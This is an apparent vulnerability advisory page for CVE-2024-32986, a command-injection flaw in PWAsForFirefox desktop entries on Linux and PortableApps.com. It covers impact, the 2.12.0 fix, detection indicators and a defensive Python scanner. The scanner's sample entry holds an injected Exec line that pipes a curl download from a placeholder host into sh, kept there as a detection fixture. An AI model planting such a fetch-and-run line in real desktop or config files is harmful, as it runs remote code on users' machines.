CVE-2024-32986
📋 TL;DR
This vulnerability allows malicious Progressive Web Apps (PWAs) to inject arbitrary code execution commands into desktop configuration files on Linux and PortableApps.com platforms. When a user launches a compromised web app, it can execute arbitrary system commands with the user's privileges. This affects all Linux and PortableApps.com users of PWAsForFirefox versions before 2.12.0.
💻 Affected Systems
- PWAsForFirefox
⚠️ Manual Verification Required
This CVE does not have specific version information in our database, so automatic vulnerability detection cannot determine if your system is affected.
Why? The CVE database entry doesn't specify which versions are vulnerable (no version ranges provided by the vendor/NVD).
- Review the CVE details at NVD
- Check vendor security advisories for your specific version
- Test if the vulnerability is exploitable in your environment
- Consider updating to the latest version as a precaution
⚠️ Risk & Real-World Impact
Worst Case
Full system compromise via arbitrary code execution with user privileges, potentially leading to privilege escalation, data theft, or ransomware deployment.
Likely Case
Malicious web app executes arbitrary commands to steal user data, install malware, or establish persistence on the system.
If Mitigated
No impact if patched to version 2.12.0 or if using Windows/macOS platforms.
🎯 Exploit Status
Exploitation requires user interaction to install the malicious PWA, but once installed, code executes automatically on launch.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 2.12.0
Vendor Advisory: https://github.com/filips123/PWAsForFirefox/security/advisories/GHSA-jmhv-m7v5-g5jq
Restart Required: Yes
Instructions:
1. Open Firefox.
2. Go to Add-ons Manager (Ctrl+Shift+A).
3. Find PWAsForFirefox.
4. Click 'Check for updates'.
5. Update to version 2.12.0.
6. Restart Firefox.
🔧 Temporary Workarounds
No known workarounds
The advisory states there are no known workarounds for this vulnerability.
🧯 If You Can't Patch
- Temporarily disable or uninstall PWAsForFirefox extension until patching is possible.
- Avoid installing new PWAs and be cautious with existing PWAs from untrusted sources.
🔍 How to Verify
Check if Vulnerable:
Check the PWAsForFirefox version in the Firefox Add-ons Manager. If the version is below 2.12.0 and you are on Linux or PortableApps.com, you are vulnerable.
Check Version:
Not applicable; check via the Firefox Add-ons Manager interface.
Verify Fix Applied:
Confirm version is 2.12.0 or higher in Firefox Add-ons Manager.
📡 Detection & Monitoring
Log Indicators:
- Unexpected Exec commands in XDG Desktop Entries or AppInfo.ini files
- Suspicious process execution from PWA launchers
Network Indicators:
- Unusual outbound connections from Firefox/PWA processes
SIEM Query:
Process creation where parent process is Firefox and command line contains suspicious patterns from PWA directories.
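A defender-side check for the first log indicator above (unexpected Exec commands in XDG desktop entries), added here as an example and not code from the PWAsForFirefox project. It parses a desktop entry and flags Exec lines whose program is not the expected launcher, that contain shell metacharacters, or that occur more than once in one entry; the launcher name `firefoxpwa`, the scan directory and the sample entry are assumptions or constructed for the example.

```python
"""Scan XDG desktop entries for Exec lines that do not belong to the PWA launcher.

Assumptions: the legitimate launcher binary is named `firefoxpwa` and PWA
entries live in the directory passed to scan_directory (e.g. ~/.local/share/applications).
"""
import re
from pathlib import Path

EXPECTED_LAUNCHER = "firefoxpwa"            # assumption: launcher binary name
SHELL_META = re.compile(r"[;&|`$<>(){}]")   # should never appear in a clean Exec value

# Constructed sample: the first Exec line is what a clean entry would carry,
# the second is an injected command of the kind the advisory describes.
SAMPLE_ENTRY = """[Desktop Entry]
Type=Application
Name=Example App
Exec=firefoxpwa site launch 01ARZ3NDEKTSV4RRFFQ69G5FAV
Exec=sh -c 'curl http://example.invalid/x | sh'
"""


def find_suspicious_exec(entry_text, expected_launcher=EXPECTED_LAUNCHER):
    """Return (line_no, reason, value) for every Exec line that looks injected."""
    findings = []
    exec_lines = 0
    for line_no, line in enumerate(entry_text.splitlines(), 1):
        key, sep, value = line.partition("=")
        if not sep or key.strip() != "Exec":
            continue
        exec_lines += 1
        value = value.strip()
        argv0 = value.split()[0] if value else ""
        if Path(argv0).name != expected_launcher:
            findings.append((line_no, "unexpected launcher", value))
        elif SHELL_META.search(value):
            findings.append((line_no, "shell metacharacters", value))
    # A well-formed entry has exactly one Exec key; a second one means something was appended.
    if exec_lines > 1:
        findings.append((0, "multiple Exec keys", str(exec_lines)))
    return findings


def scan_directory(directory):
    """Map each *.desktop file under `directory` to its findings (empty list = clean)."""
    results = {}
    for path in Path(directory).glob("*.desktop"):
        results[path.name] = find_suspicious_exec(path.read_text(errors="replace"))
    return results


if __name__ == "__main__":
    for finding in find_suspicious_exec(SAMPLE_ENTRY):
        print(finding)
```

Run `scan_directory` against the applications directory on a host that has PWAs installed; any non-empty result deserves a look before the corresponding app is launched again.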
🔗 References
- https://github.com/filips123/PWAsForFirefox/commit/9932d4b289631d447f88ace09a2fabafe4cd5bd5
- https://github.com/filips123/PWAsForFirefox/releases/tag/v2.12.0
- https://github.com/filips123/PWAsForFirefox/security/advisories/GHSA-jmhv-m7v5-g5jq